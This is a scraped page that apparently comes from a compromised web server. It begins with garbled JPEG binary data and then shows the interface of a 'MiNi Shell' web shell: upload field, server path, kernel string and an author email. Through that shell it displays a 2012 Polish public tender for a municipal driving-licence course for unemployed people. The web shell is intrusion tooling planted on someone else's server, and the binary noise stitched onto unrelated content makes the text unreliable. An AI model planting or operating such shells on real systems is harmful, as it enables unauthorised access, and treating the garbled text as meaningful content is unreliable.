JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120907/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120907/336546-N-2012.html

<p class="kh_header"><b>Piotrków Kujawski: Przeprowadzenie kursu prawa jazdy kat. B dla osób bezrobotnych i nieaktywnych zawodowo w ramach projektu systemowego pn.: AKTYWNI NA START
realizowanego przez Miejsko - Gminny Ośrodek Pomocy Społecznej 
w Piotrkowie Kujawskim</b><br>
<b>Numer ogłoszenia: 336546 - 2012; data zamieszczenia: 07.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejsko-Gminny Ośrodek Pomocy Społecznej , ul. Słoneczna 32, 88-230 Piotrków Kujawski, woj. kujawsko-pomorskie, tel. 54 26 54 184, faks 54 26 54 980.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie kursu prawa jazdy kat. B dla osób bezrobotnych i nieaktywnych zawodowo w ramach projektu systemowego pn.: AKTYWNI NA START
realizowanego przez Miejsko - Gminny Ośrodek Pomocy Społecznej 
w Piotrkowie Kujawskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem niniejszego postępowania przetargowego jest usługa zorganizowania i przeprowadzenia kursu prawa jazdy kat. B dla 10 uczestników projektu systemowego pn. AKTYWNI NA START realizowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego POKL Priorytet VII Działanie 7.1 Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.

Ilość uczestników kursu: 10 osób. 
Miejsce realizacji: 
Zajęcia teoretyczne powinny odbywać się na terenie miasta Piotrków Kujawski.   Miejsko - Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim udostępni nieodpłatnie salę szkoleniową na potrzeby zajęć.
Zajęcia praktyczne - winny odbywać się na terenie miasta Piotrków Kujawski, miasta Włocławek lub miasta Konin, lub tylko miasta Włocławek lub tylko miasta Konin, czyli w odległości nie większej niż 60 km od Piotrkowa Kujawskiego - w miejscowościach, w których przeprowadzane są egzaminy teoretyczne i praktyczne na kurs prawa jazdy kat. B.
Ilość godzin szkoleniowych: łącznie 60 godzin/os., w tym 30 godzin teoretycznych (po 45 minut) i 30 godzin praktycznych (pełne godziny zegarowe). 
2. Wymagania ogólne realizacji przedmiotu zamówienia:
2.1. Kurs prawa jazdy kat. B powinien obejmować wiedzę teoretyczną i praktyczną z zakresu danego kursu.
2.2. W przypadku zajęć teoretycznych zajęcia powinny zaczynać się nie wcześniej niż o godzinie 8.00 i kończyć nie późnej niż o godzinie 15.00.
2.3. W przypadku zajęć praktycznych zajęcia powinny zaczynać się nie wcześniej niż o godzinie 8.00 i kończyć nie późnej niż o godzinie 18.00.
2.4. Zajęcia teoretyczne powinny odbywać się na terenie miasta Piotrków Kujawski.  
Miejsko - Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim udostępni nieodpłatnie salę szkoleniową na potrzeby zajęć.
2.5. Zajęcia praktyczne powinny odbywać się na terenie miasta Piotrków Kujawski, miasta Włocławek, miasta Konin, lub tylko miasta Włocławek lub tylko miasta Konin tj. w odległości nie większej niż 60 km od Piotrkowa Kujawskiego. Samochody, na których prowadzone będą zajęcia praktyczne muszą być w pełni sprawne technicznie. 
Jeżeli zajęcia i/lub egzaminy będą odbywać się poza terenem miasta Piotrków Kujawski, wówczas organizacja dowozu uczestników oraz koszty z tym związane pokrywa Wykonawca.
2.6. W przypadku realizacji zajęć teoretycznych poza siedzibą MGOPS, w innej Sali szkoleniowej na terenie miasta Piotrków Kujawski, sala ta winna być przystosowana na potrzeby szkoleniowe i musi spełniać wymogi prawne w zakresie BHP i p.poż. Wykonawca winien wyposażyć salę szkoleniową na potrzeby zajęć teoretycznych w sprzęt i pomoce dydaktyczne odpowiednie do przeprowadzenia kursu prawa jazdy kat. B z uwzględnieniem przepisów BHP.
2.7. Wykonawca zapewni materiały szkoleniowe dla uczestników kursu (podręczniki i płyty CD z testami egzaminacyjnymi), które zostaną przekazane im na własność.
2.8. W koszt kursu należy wliczyć opłatę za pierwszy egzamin teoretyczny i praktyczny. 
2.9. Dokumentacja szkolenia, zaświadczenia, certyfikaty, materiały szkoleniowe oraz sala dydaktyczna winny być oznakowane przez Wykonawcę poprzez umieszczenie logo typów UE, EFS, POKL i nazwę projektu. 
2.10. Wykładowcy i instruktorzy prowadzący zajęcia powinni posiadać odpowiednie kwalifikacje i umiejętności oraz doświadczenie zawodowe. 
2.11. W ramach zamówienia Wykonawca zobowiązany jest skierować uczestników kursu na badania lekarskie niezbędne do ukończenia kursu prawa jazdy kat. B. Koszt badań lekarskich pokrywa Wykonawca dlatego w oferowaną cenę kursu należy doliczyć ich koszt.
2.12. Wykonawca zobowiązany jest do ubezpieczenia uczestników kursu od następstw nieszczęśliwych wypadków powstałych w trakcie trwania kursu oraz w drodze na zajęcia i powrotnej z zajęć do miejsca zamieszkania.
2.13. W czasie przerw pomiędzy zajęciami teoretycznymi Wykonawca zobowiązany jest zapewnić uczestnikom kursu napoje w postaci: kawy, herbaty i wody mineralnej oraz poczęstunek w postaci drożdżówki lub pączka dla każdego z uczestników jak również paluszków i 2 rodzajów kruchych ciastek. Dodatkowo, w przypadku zajęć przekraczających  5 godzin szkoleniowych w ciągu dnia, Wykonawca zobowiązany jest zapewnić ciepły posiłek, przez co rozumie się jednodaniowy obiad złożony z: 150g mięsa lub ryby (waga po przetworzeniu), 150-200g gotowanych ziemniaków, kaszy lub ryżu oraz 150g surówki.
2.14. Na zakończenie kursu prawa jazdy kat. B Wykonawca zobowiązany jest przygotować i przeprowadzić z uczestnikami anonimową ankietę określającą stopień zadowolenia z uczestnictwa.
2.15. Kurs prawo jazdy kat. B powinien zakończyć się egzaminem wewnętrznym, sprawdzającym zdobytą wiedzę teoretyczną i praktyczną. Wykonawca jest zobowiązany powiadomić Zamawiającego o dacie, miejscu i godzinie egzaminu uczestników kursu. 
2.16. Po zdaniu egzaminu wewnętrznego teoretycznego i praktycznego przez uczestników kursu prawa jazdy kat. B uczestnicy kursu powinni otrzymać zaświadczenia lub certyfikaty, potwierdzające ukończenie kursu prawa jazdy kat. B, z kolorowymi logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej i informacji: Projekt realizowany przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim pt. AKTYWNI NA START, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1.
2.17. Wykonawca będzie prowadził dokumentację szkolenia i zobowiązany jest do sporządzenia i przekazania Zamawiającemu w terminie do 5 dni po zakończeniu kursu prawa jazdy kat. B: 
a) dziennika zajęć zawierającego wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności uczestników kursu, potwierdzone ich własnoręcznymi podpisami; 
b) protokołu odbioru materiałów szkoleniowych przez uczestników kursu, potwierdzonych ich własnoręcznymi podpisami;
c) protokołu z przeprowadzonego egzaminu wewnętrznego zawierającego imienny wykaz osób, które ukończyły kurs prawa jazdy kat. B, zdały/nie zdały egzamin wewnętrzny teoretyczny i praktyczny; 
d) kopii zaświadczeń lub certyfikatów z kolorowymi logo Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej i informacją: Projekt realizowany przez Miejsko-Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim pt.AKTYWNI NA START, współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1, potwierdzające ukończenie kursu przez uczestników projektu;
e) rejestr potwierdzający odbiór wydanych zaświadczeń o ukończeniu kursu, 
f) protokołu odbioru przez uczestników kursu poczęstunku i ciepłego posiłku, potwierdzonego ich własnoręcznymi podpisami;
g) kopii dokumentu potwierdzającego ubezpieczenie uczestników od następstw nieszczęśliwych wypadków; 
h) kopii zaświadczeń lekarskich, z przeprowadzonych badań w ramach organizacji kursu;
i) kopii dokumentów potwierdzających uiszczenie opłaty za pierwszy egzamin teoretyczny i praktyczny uczestników kursu oraz należy podać terminy w/w egzaminów ;
j)  ankiet przeprowadzonych wśród uczestników na zakończenie kursu prawa jazdy kat. B.
2.18. Wykonawca zobowiązuje się do ochrony danych osobowych uczestników projektu oraz przetwarzania tych danych wyłącznie dla potrzeb prowadzenia kursu. 
2.19. Wykonawca sporządzi i przekaże Zamawiającemu na 7 dni przed rozpoczęciem kursu: harmonogram szkolenia obejmujący jego nazwę i zakres, czas trwania, plan nauczania określający tematy zajęć oraz ich wymiar wraz ze wskazaniem miejsca przeprowadzenia szkolenia (zajęć teoretycznych i praktycznych).  
3. Zamawiający zastrzega sobie prawo do kontroli prowadzonego kursu, w tym niezapowiedzianej, przez uprawnione organy nadzoru i kontroli. Kontrola może zostać przeprowadzona zarówno w siedzibie Zamawiającego, w miejscu realizacji Projektu, jak i w innym miejscu określonym przez uprawniony podmiot dokonujący kontroli.
4. Prowadzone szkolenia zawodowe zostaną umieszczone przez Wykonawcę w bazie danych ofert szkoleniowych na stronie internetowej www.inwestycjawkadry.pl..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 05.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie     o posiadaniu uprawnień do wykonywania określonej działalności lub czynności na druku, stanowiącym załącznik nr 2 do SIWZ oraz załączy koncesję, zezwolenie lub licencję na świadczenie tego rodzaju usług, jakich dotyczy zamówienie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży:
- oświadczenie, że posiada wiedzę i doświadczenie niezbędne do realizacji przedmiotu zamówienia na druku stanowiącym załącznik nr 2 do SIWZ
oraz
- oświadczy, że wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej dwie usługi, odpowiadające swoim rodzajem usłudze (rozumianym jako tematyka kursu) na druku stanowiącym załącznik nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży:
- oświadczenie o dysponowaniu odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia na druku, stanowiącym załącznik nr 2 do SIWZ
oraz
- wykaz osób zdolnych do wykonania zamówienia, zawierający informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania poszczególnych części zamówienia, a także zakresu wykonywanych przez nie czynności, przedstawiony na druku stanowiącym załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży - wykaz osób zdolnych do wykonania zamówienia, zawierający informację na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania poszczególnych części zamówienia, a także zakresu wykonywanych przez nie czynności, przedstawiony na druku stanowiącym załącznik nr 5 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca złoży oświadczenie      o pozostawaniu w sytuacji ekonomicznej i finansowej, zapewniającej wykonanie zamówienia, na druku stanowiącym załącznik nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zgodnie ze specyfikacją istotnych warunków zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadkach, gdy:
a)nastąpi zmiana przepisów wpływających na realizację przedmiotu zamówienia, 
b)konieczność wprowadzenia zmian będzie następstwem zmian prowadzonych      w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi wdrażanie Programu Operacyjnego Kapitał Ludzki,        w ramach którego realizowane jest zamówienie, szkołami w których realizowany jest przedmiot umowy;
c)konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej;
d)konieczność wprowadzenia zmian będzie następstwem zmian organizacyjnych po stronie Zamawiającego;
e)z powodu okoliczności siły wyższej, np.: wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć w chwili zawarcia umowy;
f) uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego lub Wykonawcę, jeżeli te zmiany są korzystne dla Zamawiającego,
g)zaistnieją okoliczności niezależne od Zamawiającego lub Wykonawcy, uzasadniające zmianę terminu realizacji przedmiotu umowy.
Zamawiający dopuszcza także zmianę osoby/osób prowadzącej/ych zajęcia w toku realizacji zamówienia, ale jedynie w uzasadnionych przypadkach, w szczególności na wypadek choroby lub innej okoliczności uniemożliwiającej osobie prowadzącej zajęcia wykonywanie obowiązków wynikających z umowy. Zmiana osoby prowadzącej zajęcia wymaga uzyskania pisemnej zgody Zamawiającego oraz jest dopuszczalna pod warunkiem, że wskazana osoba (zastępca) posiada takie same kwalifikacje i co najmniej takie samo doświadczenie zawodowe jak osoba wskazana w ofercie Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.piotrkowkujawski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko -Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim, ul. Słoneczna 32, 88-230 Piotrków Kujawski, woj. kujawsko-pomorskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 12:00, miejsce: Miejsko -Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim, ul. Słoneczna 32, 88-230 Piotrków Kujawski, woj. kujawsko-pomorskie, Pokój nr 1 (I Piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt realizowany przez Miejsko -Gminny Ośrodek Pomocy Społecznej w Piotrkowie Kujawskim pn. AKTYWNI NA START jest projektem systemowym współfinsnowanym przez Unię Europejską ze środków Europejskiego Funduszu Społecznego z Programu Operacyjnego Kapitał Ludzki, Priorytet VII, Działanie 7.1 Poddziałanie 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com